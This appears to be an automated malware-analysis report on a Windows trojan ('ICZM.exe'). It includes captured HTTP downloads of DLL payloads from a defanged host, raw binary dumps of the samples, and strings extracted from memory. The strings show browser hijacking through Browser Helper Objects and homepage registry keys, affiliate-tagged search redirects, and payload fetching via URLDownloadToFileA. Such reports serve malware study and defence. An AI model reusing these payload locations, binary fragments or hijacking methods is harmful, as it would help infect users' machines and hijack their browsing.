X-Via: 1.1 PShlamstdAMS1uv190:8 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........2*..\y..\y
..\y...y..\y...y..\y...y..\y...y..\y..]y..\y...y..\y...y..\y...y..\y..
.y..\yRich..\y........................PE..L....m`X...........!........
........P.....................................................@.......
..........................x...........x...................p...........
............................$...H.....................................
......UPX0....................................UPX1....................
............@....rsrc...............................@.................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
.......3.91.UPX!.......RXh...o..O...."..&.......U..j.h..!P..Y.d...P...
SV....W..0.1E.3.P.E...e.3o.....u.(0.E......x...........;.....f.y,.su.A
0....nt......Nuf.P..tTuY....,dDuL.lLl.$.u?.2.x..u,,...l..........<.
.....<...q........L....o.d....E.......M........Y_^[..]........p....
.Y..MZ.9.t.j2.o..J.<...8PE.u..........2..E...d.V....?X..u..I.N..t0.
....:.u.A.M.B.U...w......... ...)d.B....?...v.....d$...........u.i ..B
..r!C.3...0}..@..}.......9........&..t..C<.D.x...3<...;.u.|.H.^.
..e{ .......@$<.......V.L..3.m.;}.sZ....F&......U.;.....u0Q.U.M
<<< skipped >>>


GET /d/CDClient.dll HTTP/1.1
Host: VVV.go890.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 200 OK
Date: Fri, 06 Oct 2017 12:08:59 GMT
Server: kangle/2.9.6
Last-Modified: Fri, 01 Jul 2016 14:11:45 GMT
Content-Type: application/octet-stream
Content-Length: 26112
Age: 1
X-Via: 1.1 PShlamstdAMS1uv190:5 (Cdn Cache Server V2.0)
Connection: keep-alive
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................
......................................................................
..............................................PE..L....^B*............
.....r...,....................@.......................... ............
..............................................d.......................
......................................................................
..............CODE.............N......PEC2^O...... ....rsrc.... ......
.....R.............. ....reloc...............d..............@.........
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................*.........@...StringX..wz.
.-<......x....l,...T..,.Object.%0.......,($ ....D.@................
........<...~|...T.P..>~L..\..........S....@,\g.T........D$,.t..
.\$0..D[.,.....~~~~....v~~...SV........>.u:hDj.9. ;.w....u.3.^.....
........@3......D........B..du.............@.L.Z......#........P.../P,
V.....X...dB.....&.P....Q..m............WUQ....$...].$c.=.......;S..S.
;.u.L.]..?.CX..cC..F....m...;u.x..n..;.uoC.........|..Z]_h3..\&.o....2
;s.z..rp...J..k.....wbu.......)'..D.{.H..'....z...[...)..L..*.....
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

ICZM.exe_1388:

.idata
.rdata
.reloc
.rsrc
.aspack
.adata
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
KERNEL32.DLL
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
TIdTCPConnectionp
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordD
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
UhB%C
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponsexWC
TIdHTTPRequest
TIdHTTPRequest0XC
TIdHTTPProtocolDYC
TIdCustomHTTP
TIdCustomHTTPDYC
TIdHTTP,[C
TIdHTTPtZC
HTTPOptions
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
1.2.8
hXXp://VVV.hao123.com
$iegÍnor$b~g5zcn7yeme
TP...Error
SE...Error
C:\kclient
inflate 1.2.8 Copyright 1995-2013 Mark Adler
C:\Windows\System32\CDCLOG.txt
2017-10-06
17:46:14
17:46:13
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetCPInfo
version.dll
MsgWaitForMultipleObjects
shell32.dll
.CHwP
%0S$x]
qu@}%U
jN-.xA
%C]>p
:S.yd
.BR_q
:<.Uz
R%u1'yT
.LO"J
fyC
ha.yKF
e%0s.G2
VC-CUk}rY
*b.gB
bvh-I}
jcw%s
sS?
&*.Xf)]
.SF|F)t
s1ø
fV%smIH
@%u|lj
.uB\A/
)%f%?
J|.TL
N.tCN3!
'(.rsxQq
C=.gdnX{
X%4Uu
 \.Gp|
?.QH)
0%smz3
L.dBEm
|N~.PX
%3SY-
#L.rJ@
A.ETBp&
6q0.KFH
SQf%u.
.UW2c@
.dWdb4
WwSÑ
.ov'F
.YuRGDn
R6G%u
V20.VcB
(71.HJB
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
<requestedExecutionLevel level="requireAdministrator"/>
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
1.0.3.27
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s$''%s'' is not a valid component name
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
hXXp://VVV.5636.com

ICZM.exe_1388_rwx_016D1000_0000D000:

kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
hXXp://VVV.go890.com/d/Client.dll
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
GetCPInfo
URLMON.DLL
URLDownloadToFileA
KWindows
UrlMon
Invalid variant operation
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

ICZM.exe_1388_rwx_016DF000_00002000:

kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
URLMON.DLL
URLDownloadToFileA
[pcedur%s
.tDLLj

ICZM.exe_1388_rwx_016F0000_00002000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

ICZM.exe_1388_rwx_01C90000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

ICZM.exe_1388_rwx_027B1000_0018D000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
PSAPI.dll
ole32.dll
Uh-R}
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port@
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPort06~
OnExecutel
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword@
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponset
TIdHTTPRequest
TIdHTTPRequest,
TIdHTTPProtocol@
TIdCustomHTTP
TIdCustomHTTP@
TIdHTTP(
TIdHTTPp
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown4y
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
AutoHotkeys(
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserApp0
IWebBrowser2d
bstrUrlContext
bstrUrl
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop\
OnWindowSetWidth
OnWindowSetHeight
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
TIdUDPBase
IdUDPBase
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
IdUDPServer
DefaultPort
OnUDPRead
1.2.8
"TProcess_WinProc_WinHWND_Operating
TMyBrowserCheckOpenUrl
TMyCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\
YY.exe
LolClient.exe
winloader.exe
Droid4xSW.exe
MobileSimulate.exe
MONIwan.exe
AndroidEmulator.exe
Ínor%o|od~
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
8:;9$8$;$;
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
explorer.exe
svchost.exe
dwm.exe
taskeng.exe
lsm.exe
wininit.exe
conhost.exe
spoolsv.exe
taskhost.exe
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
WP....OK
WP....ERROR
UrlAD:
VVV.baidu.com/s?
Get url Err...
Windows NT\Accessories\
acLuaua.dll
HintSock.dll
sogou.com
VVV.sogou.com/index.htm?pid=
http:
{D878EB20-C55A-4402-8B25-6387D34F10CB}
{4958F3A2-1032-49af-8BDC-FA4C0C0931ED}
{77EEBB61-8868-4FA1-8A9D-AB54F43C7D92}
{992B79F3-7E84-4C58-AD30-0B72034EC192}
{AF9143FF-D8F3-4ACE-B736-4757B5918388}
{E58EE67D-E279-4C21-B87C-E9DCC9EA6F1F}
{8605FF4E-830B-4E07-A811-FDB48E8BF0BB}
{00000000-0593-4356-9CF7-1D8C2B3343C0}
{452700E0-9F72-421E-8ACC-1948A30751BD}
{505D8605-AB58-4243-8BA0-D7FE50A79698}
{19F620A5-6106-453A-856D-D66E967C45D8}
{F7AD480D-C4A9-4816-96B0-49620E1C1141}
{9D03EDFD-BB04-4E90-AFEA-42B84C6E2141}
{BC10E8CB-3CFA-4F61-A5E1-846506D33FAF}
{7390f3d8-0439-4c05-91e3-cf5cb290c3d0}
{77FEF28E-EB96-44FF-B511-3185DEA48697}
{6E28339B-7C6E-47B6-AEB2-46BA53782379}
{02AC20DD-5548-4CA7-ACCF-18AFE5A4A072}
{3C696E52-BF38-49A8-9017-ACE15A794707}
{4D8CE2EB-5AC8-47F9-8103-3A8AC5B868DF}
{29CF293A-1E7D-4069-9E11-E39698D0AF95}
except..BHO
%System%\BBN.dll
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
except..Stop
-AAB6-4EFB-8BD1-
UpdateEXEPath
1.0.6.75
RestoreTCP
C:\Windows\sysnative\drivers\kWppProxy.sys
$iegÍnor$zbz5~d7
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
123.sogou.com/?
VVV.sogou.com
VVV.2345.com/
VVV.hao774.com/
/pos.baidu.com/
VVV.so.com/link?
a1.alicdn.com
/i/blank.png
192.168.
msdialg100_D.dll
UDO.EXE
IPROTECT.EXE
DIC...WAE
BarClient.exe
BarClientView.exe
\drivers\qmtgpnetflow764.sys
\system32\ntoskrnl.exe
\kavbootc64.sys
drivers\nvlddmkm.sys
\drivers\stpdrive.sys
\drivers\tesmon.sys
mk~2$do~%ss5dcn7
mk~2$do~þf5dcn7
90150-00003
hXXp://dwz.cn/
hXXp://t.cn/
/static.lz.topfreeweb.net
VVV.ra2ol.com/client
b~~z0%þhhs$mi=9$ieg
b~~z0%%xoieggodn$r
*VVV.tyc[0-9].com*
*VVV.tyc[0-9][0-9].com*
*tyc[0-9][0-9][0-9].com*
*tyc[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]tyc.com*
*VVV.[0-9][0-9]tyc.com*
*[0-9][0-9][0-9]tyc.com*
*[0-9][0-9][0-9][0-9]tyc.com*
*VVV.sun[0-9].com*
*VVV.sun[0-9][0-9].com*
*sun[0-9][0-9][0-9].com*
*sun[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]sun.com*
*VVV.[0-9][0-9]sun.com*
*[0-9][0-9][0-9]sun.com*
*[0-9][0-9][0-9][0-9]sun.com*
*VVV.sb[0-9].com*
*VVV.sb[0-9][0-9].com*
*sb[0-9][0-9][0-9].com*
*sb[0-9][0-9][0-9][0-9].com*
*VVV.[0-9][0-9]sb.com*
*VVV.[0-9][0-9][0-9]sb.com*
*[0-9][0-9][0-9][0-9]sb.com*
*VVV.hg[0-9][0-9].com
*VVV.hg[0-9][0-9][0-9].com
*hg[0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.ra[0-9].com*
*VVV.ra[0-9][0-9].com*
*VVV.ra[0-9][0-9][0-9].com*
*ra[0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.xpj[0-9][0-9].com*
*xpj[0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9][0-9].com*
*VVV.s8s[0-9].com*
*s8s[0-9][0-9].com*
*s8s[0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9][0-9].com*
*s8s[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.s8s[0-9].me*
*s8s[0-9][0-9].me*
*s8s[0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9][0-9].me*
*s8s[0-9][0-9][0-9][0-9][0-9][0-9].me*
*js[0-9][0-9][0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9][0-9].com*
*pj[0-9][0-9][0-9][0-9][0-9][0-9].com*
*pj[0-9][0-9][0-9][0-9][0-9].com*
*vnsr[0-9][0-9][0-9][0-9][0-9].com*
*vnsr[0-9][0-9][0-9][0-9].com*
*vnsr[0-9][0-9][0-9].com*
*vns[0-9][0-9][0-9][0-9][0-9].com*
*vns[0-9][0-9][0-9][0-9].com*
*vns[0-9][0-9][0-9].com*
*ylg[0-9][0-9][0-9][0-9].com*
*ylg[0-9][0-9][0-9][0-9].[0-9].com*
*bm[0-9][0-9][0-9].[0-9].com*
*bm[0-9][0-9][0-9][0-9[0-9].com*
*blr[0-9][0-9][0-9].com*
*blr[0-9][0-9][0-9][0-9].com*
*blr[0-9][0-9][0-9][0-9][0-9].com*
*yinhe[0-9][0-9].com*
*yinhe[0-9][0-9][0-9].com*
*yinhe[0-9][0-9][0-9][0-9].com*
*dhy[0-9][0-9][0-9].com*
*dhy[0-9][0-9][0-9][0-9].com*
*[0-9]suncity.com*
*[0-9][0-9]suncity.com*
*[0-9][0-9][0-9]suncity.com*
VVV.baidu.com/favicon.ico
VVV.hao123.com/favicon.ico
VVV.gzmxol.com/dhh_launcher/
.com/favicon.ico
link?url=
üda%
run.519ky.cn
mp.32dp.cn
ok.x5wb.com
index.2345wb.com
mk.5hpp.com
hao.k6kb.xyz
VVV.2345mini.com
hao.91wanyx.lol
wb.91wanyx.lol
VVV.wb988.com
hlybar.com
ie.17kanyx.cc
VVV.xqj-net.com
5500w.com
mk.vee9.com
VVV.58wangwei.com
hao.webnav.top
iehome.ssoor.com
gmrb.com.cn
VVV.hao522.com
hao522.com
icafedh.com
baibu.com
ieadd.adkuai8.com
index.jj123.com.cn
index.hao2016.net
hao.169x.cn
169x.cn
VVV.qidiannet.cn
ok.32wb.com
wbspdh.wicp.net
netbar.6-6.cn
42.62.30.180
dwz.cn
VVV.9973.com
9973.com
61.160.250.4
VVV.msn.com
msn.com
VVV.baiduso.com
baiduso.com
index.114wb.net
cdc.114wb.net
114wb.net
123.yhkj9.com
index.58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
VVV.aiwbnet.net
VVV.yaojyw.net
VVV.gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
www1.7899987.com
7899987.com
0.baidu.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
cn.hao123.com
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
sogoulp.com
VVV.2345.com
2345.com
VVV.hao774.com
dh.c37.cc
123.qiuquan.cc
hao.5in8.com
VVV.5334.com
huaer.87vu.cn
VVV.atlanticsexy.com
://index.6-6.cn
hao.vrarmrm.xyz
hao.fvrarmr.xyz
//hao.qq.com/
VVV.so.com
listen.630fg.cn
mr.75wv.cn
hao.bcxrb.xyz
run.519ky.cn/
/t.cn/
123.k6kb.xyz
.91wanyx.lol
VVV.hlybar.com
xqj-net.com
.114wb.net
wbsite2016.net
.hao522.com
VVV.icafedh.com
.hao2016.net
daohang2016.com
pownet.net
42.62.30.180/
dwz.cn/OXHad
d9media.cn
web.sogou.com/?
VVV.hao123.com/?tn=
cn.hao123.com/?tn=
VVV.baidu.com/?tn=
VVV.baidu.com/index.php?tn=
VVV.baidu.com/home?dsp=netbar&tn=
VVV.sogou.com/index.htm?pid=sogou-netb-d
VVV.bmywm.com/sg
hao.360.cn/?
123.sogou.com/?71066-
123.sogou.com/?71084-
123.sogou.com/?71013
123.sogou.com/?71021
123.sogou.com/?71032
VVV.sogou.com/index.htm?pid=sogou-netb-c
VVV.pc918.net
index.woai310.com
VVV.sogou58.com
VVV.tao123.com
huo99.com
VVV.2345.com/?
VVV.soso.com/?unc=
VVV.soso.com/wbhp.shtml?unc=
VVV.soso.com/wbhp.shtml?cid=union.s.wh&unc=q
VVV.youdao.com/n3/?keyfrom=netb.yiyong&vendor=netb.yiyong_
VVV.sogou.com/index.htm?pid=sogou-netb-1
VVV.sogou.com/index.htm?pid=sogou-netb-3
VVV.sogou.com/index.htm?pid=sogou-netb-4
VVV.sogou.com/index.htm?pid=sogou-netb-6
VVV.sogou.com/index.htm?pid=sogou-netb-7
VVV.sogou.com/index.htm?pid=sogou-netb-8
VVV.sogou.com/index.htm?pid=sogou-netb-9
VVV.sogou.com/index.htm?pid=sogou-netb-2e7c
VVV.sogou.com/index.htm?pid=sogou-netb-b
VVV.sogou.com/index.htm?pid=sogou-netb-c20
VVV.hao123.com/?tn=96012662_hao_pg
VVV.hao123.com/?tn=96994152_hao_pg
123.sogou.com/?71063-5
VVV.hao123.com/?tn=99123885_hao_pg
VVV.hao123.com/?tn=94287050_hao_pg
VVV.hao123.com/?tn=92823465_hao_pg
VVV.hao123.com/?tn=93908426_hao_pg
VVV.hao123.com/?tn=90567778_hao_pg
hao123.com/?tn=91163052_hao_pg
123.sogou.com/?71069-1004
VVV.baidu.com/s?tn=32
doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
